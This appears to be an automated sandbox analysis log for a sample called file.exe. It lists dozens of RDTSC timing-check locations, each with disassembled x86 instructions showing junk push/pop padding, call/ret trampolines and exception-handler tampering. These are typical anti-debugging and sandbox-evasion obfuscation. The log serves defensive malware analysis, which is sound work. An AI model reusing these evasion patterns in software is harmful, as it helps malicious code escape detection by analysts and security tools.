                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA9559 second address: BA95DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FB9B11D9857h 0x0000000a popad 0x0000000b nop 0x0000000c xor dword ptr [ebp+122D3765h], eax 0x00000012 xor bh, FFFFFFADh 0x00000015 push dword ptr fs:[00000000h] 0x0000001c push 00000000h 0x0000001e push ebp 0x0000001f call 00007FB9B11D9848h 0x00000024 pop ebp 0x00000025 mov dword ptr [esp+04h], ebp 0x00000029 add dword ptr [esp+04h], 0000001Dh 0x00000031 inc ebp 0x00000032 push ebp 0x00000033 ret 0x00000034 pop ebp 0x00000035 ret 0x00000036 mov dword ptr fs:[00000000h], esp 0x0000003d mov bl, C0h 0x0000003f mov eax, dword ptr [ebp+122D026Dh] 0x00000045 jl 00007FB9B11D9852h 0x0000004b jp 00007FB9B11D984Ch 0x00000051 push FFFFFFFFh 0x00000053 movzx ebx, dx 0x00000056 movzx edi, bx 0x00000059 push eax 0x0000005a pushad 0x0000005b push eax 0x0000005c push edx 0x0000005d pushad 0x0000005e popad 0x0000005f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BAA532 second address: BAA5BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a movzx ebx, bx 0x0000000d jno 00007FB9B100571Eh 0x00000013 push dword ptr fs:[00000000h] 0x0000001a mov ebx, 3F0F7672h 0x0000001f mov dword ptr fs:[00000000h], esp 0x00000026 push 00000000h 0x00000028 push ebx 0x00000029 call 00007FB9B1005718h 0x0000002e pop ebx 0x0000002f mov dword ptr [esp+04h], ebx 0x00000033 add dword ptr [esp+04h], 00000016h 0x0000003b inc ebx 0x0000003c push ebx 0x0000003d ret 0x0000003e pop ebx 0x0000003f ret 0x00000040 mov bx, dx 0x00000043 mov eax, dword ptr [ebp+122D0E3Dh] 0x00000049 cld 0x0000004a push FFFFFFFFh 0x0000004c push 00000000h 0x0000004e push eax 0x0000004f call 00007FB9B1005718h 0x00000054 pop eax 0x00000055 mov dword ptr [esp+04h], eax 0x00000059 add dword ptr [esp+04h], 0000001Bh 0x00000061 inc eax 0x00000062 push eax 0x00000063 ret 0x00000064 pop eax 0x00000065 ret 0x00000066 mov dword ptr [ebp+122D2910h], edx 0x0000006c push eax 0x0000006d pushad 0x0000006e push eax 0x0000006f push edx 0x00000070 jng 00007FB9B1005716h 0x00000076 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BAA5BD second address: BAA5C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BAE0F5 second address: BAE11D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9B1005729h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jng 00007FB9B1005716h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BAE11D second address: BAE127 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FB9B11D9846h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BAF0AB second address: BAF12C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push eax 0x0000000d call 00007FB9B1005718h 0x00000012 pop eax 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 add dword ptr [esp+04h], 0000001Dh 0x0000001f inc eax 0x00000020 push eax 0x00000021 ret 0x00000022 pop eax 0x00000023 ret 0x00000024 jmp 00007FB9B100571Ah 0x00000029 push 00000000h 0x0000002b mov ebx, edi 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push eax 0x00000032 call 00007FB9B1005718h 0x00000037 pop eax 0x00000038 mov dword ptr [esp+04h], eax 0x0000003c add dword ptr [esp+04h], 00000018h 0x00000044 inc eax 0x00000045 push eax 0x00000046 ret 0x00000047 pop eax 0x00000048 ret 0x00000049 sub dword ptr [ebp+12445732h], edi 0x0000004f xchg eax, esi 0x00000050 jmp 00007FB9B1005724h 0x00000055 push eax 0x00000056 push eax 0x00000057 push edx 0x00000058 push edx 0x00000059 push edx 0x0000005a pop edx 0x0000005b pop edx 0x0000005c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BAF337 second address: BAF33B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BAF33B second address: BAF345 instructions: 0x00000000 rdtsc 0x00000002 js 00007FB9B1005716h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB23ED second address: BB23F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB2A14 second address: BB2A19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB2ACE second address: BB2AD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB2CFF second address: BB2D1E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9B1005723h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d push esi 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBDDEC second address: BBDDF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBDDF0 second address: BBDE13 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9B1005725h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jo 00007FB9B1005718h 0x00000011 push esi 0x00000012 pop esi 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBDF72 second address: BBDF76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBDF76 second address: BBDF7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBDF7A second address: BBDFA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB9B11D9850h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FB9B11D9856h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBDFA9 second address: BBDFAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC541B second address: BC5464 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9B11D9859h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FB9B11D984Bh 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 jnp 00007FB9B11D9850h 0x00000019 jmp 00007FB9B11D984Ah 0x0000001e mov eax, dword ptr [eax] 0x00000020 push eax 0x00000021 push edx 0x00000022 jne 00007FB9B11D9848h 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC9822 second address: BC982D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC982D second address: BC9831 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC9831 second address: BC9842 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FB9B1005716h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC9842 second address: BC9848 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC9848 second address: BC9871 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FB9B1005716h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FB9B1005720h 0x00000014 jmp 00007FB9B100571Ah 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC99BE second address: BC99C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC99C4 second address: BC99DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 pushad 0x00000007 jmp 00007FB9B1005720h 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC99DE second address: BC99E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC99E4 second address: BC99F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC99F0 second address: BC99F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC9B7C second address: BC9B81 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC9B81 second address: BC9B87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC9B87 second address: BC9B8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC9B8D second address: BC9B93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC9E5B second address: BC9E5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC9E5F second address: BC9E63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC9E63 second address: BC9E76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push esi 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push edx 0x0000000d pop edx 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC9E76 second address: BC9E92 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9B11D984Ch 0x00000007 jns 00007FB9B11D9846h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCA2E1 second address: BCA2E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCA2E7 second address: BCA2ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCA2ED second address: BCA306 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FB9B1005722h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCEAF8 second address: BCEB2C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FB9B11D9857h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnc 00007FB9B11D9855h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCEB2C second address: BCEB34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCEB34 second address: BCEB48 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FB9B11D9846h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jo 00007FB9B11D9846h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCEB48 second address: BCEB4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCEB4C second address: BCEB50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCDA82 second address: BCDA8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FB9B1005716h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9E3F1 second address: B9E3F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9E3F6 second address: B7D9C8 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FB9B100571Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push edi 0x00000010 call 00007FB9B1005718h 0x00000015 pop edi 0x00000016 mov dword ptr [esp+04h], edi 0x0000001a add dword ptr [esp+04h], 00000017h 0x00000022 inc edi 0x00000023 push edi 0x00000024 ret 0x00000025 pop edi 0x00000026 ret 0x00000027 mov edx, 3F1E55FFh 0x0000002c call dword ptr [ebp+122D346Eh] 0x00000032 jmp 00007FB9B100571Ch 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9EAD6 second address: B9EB0A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007FB9B11D984Eh 0x0000000e popad 0x0000000f popad 0x00000010 xor dword ptr [esp], 7EB20AD3h 0x00000017 mov dword ptr [ebp+122D3669h], edx 0x0000001d push 7F57566Bh 0x00000022 jnp 00007FB9B11D984Eh 0x00000028 push ebx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9EC58 second address: B9EC5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9ED0C second address: B9ED12 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9ED12 second address: B9ED72 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 ja 00007FB9B1005716h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e jc 00007FB9B1005718h 0x00000014 pushad 0x00000015 popad 0x00000016 pop eax 0x00000017 mov eax, dword ptr [esp+04h] 0x0000001b jmp 00007FB9B1005722h 0x00000020 mov eax, dword ptr [eax] 0x00000022 je 00007FB9B100572Eh 0x00000028 mov dword ptr [esp+04h], eax 0x0000002c pushad 0x0000002d pushad 0x0000002e pushad 0x0000002f popad 0x00000030 pushad 0x00000031 popad 0x00000032 popad 0x00000033 push eax 0x00000034 push edx 0x00000035 jbe 00007FB9B1005716h 0x0000003b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9ED72 second address: B9ED76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9EFAF second address: B9EFB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9EFB3 second address: B9EFB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9EFB7 second address: B9EFC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9F332 second address: B9F336 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9F336 second address: B9F3B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ebp 0x0000000d call 00007FB9B1005718h 0x00000012 pop ebp 0x00000013 mov dword ptr [esp+04h], ebp 0x00000017 add dword ptr [esp+04h], 0000001Ch 0x0000001f inc ebp 0x00000020 push ebp 0x00000021 ret 0x00000022 pop ebp 0x00000023 ret 0x00000024 mov edi, 0D76E2C3h 0x00000029 push 0000001Eh 0x0000002b push 00000000h 0x0000002d push eax 0x0000002e call 00007FB9B1005718h 0x00000033 pop eax 0x00000034 mov dword ptr [esp+04h], eax 0x00000038 add dword ptr [esp+04h], 0000001Ah 0x00000040 inc eax 0x00000041 push eax 0x00000042 ret 0x00000043 pop eax 0x00000044 ret 0x00000045 mov ecx, dword ptr [ebp+122D38F1h] 0x0000004b mov dword ptr [ebp+122D2C59h], esi 0x00000051 push eax 0x00000052 push eax 0x00000053 push edx 0x00000054 jmp 00007FB9B1005724h 0x00000059 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9F6A1 second address: B9F6A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9F7CE second address: B9F7DE instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FB9B1005716h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9F7DE second address: B9F7E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9F7E2 second address: B9F7E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9F7E6 second address: B9F856 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 nop 0x00000008 xor edi, dword ptr [ebp+122D3905h] 0x0000000e lea eax, dword ptr [ebp+12480111h] 0x00000014 push 00000000h 0x00000016 push edi 0x00000017 call 00007FB9B11D9848h 0x0000001c pop edi 0x0000001d mov dword ptr [esp+04h], edi 0x00000021 add dword ptr [esp+04h], 0000001Bh 0x00000029 inc edi 0x0000002a push edi 0x0000002b ret 0x0000002c pop edi 0x0000002d ret 0x0000002e mov cx, 9FE8h 0x00000032 mov edi, dword ptr [ebp+122D2915h] 0x00000038 movsx edi, cx 0x0000003b nop 0x0000003c pushad 0x0000003d push eax 0x0000003e push ebx 0x0000003f pop ebx 0x00000040 pop eax 0x00000041 jng 00007FB9B11D9854h 0x00000047 jmp 00007FB9B11D984Eh 0x0000004c popad 0x0000004d push eax 0x0000004e pushad 0x0000004f push eax 0x00000050 push edx 0x00000051 jmp 00007FB9B11D984Dh 0x00000056 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9F856 second address: B9F860 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9F860 second address: B7E4FB instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FB9B11D9846h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007FB9B11D9848h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 00000014h 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 mov dl, ADh 0x00000028 call dword ptr [ebp+122D2D6Ah] 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007FB9B11D984Dh 0x00000035 jmp 00007FB9B11D9859h 0x0000003a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCDD85 second address: BCDD94 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCDD94 second address: BCDDA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jnp 00007FB9B11D9846h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCDDA3 second address: BCDDA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCE2D9 second address: BCE2DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCE703 second address: BCE70E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jp 00007FB9B1005716h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD1956 second address: BD195E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD195E second address: BD1969 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FB9B1005716h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD82AF second address: BD82B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD82B5 second address: BD82B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD82B9 second address: BD82C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD82C7 second address: BD82CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD6F82 second address: BD6FA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB9B11D9854h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pushad 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD6FA0 second address: BD6FBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jl 00007FB9B1005716h 0x0000000c jmp 00007FB9B1005721h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD6FBF second address: BD6FC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD712F second address: BD7138 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD76D9 second address: BD76DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
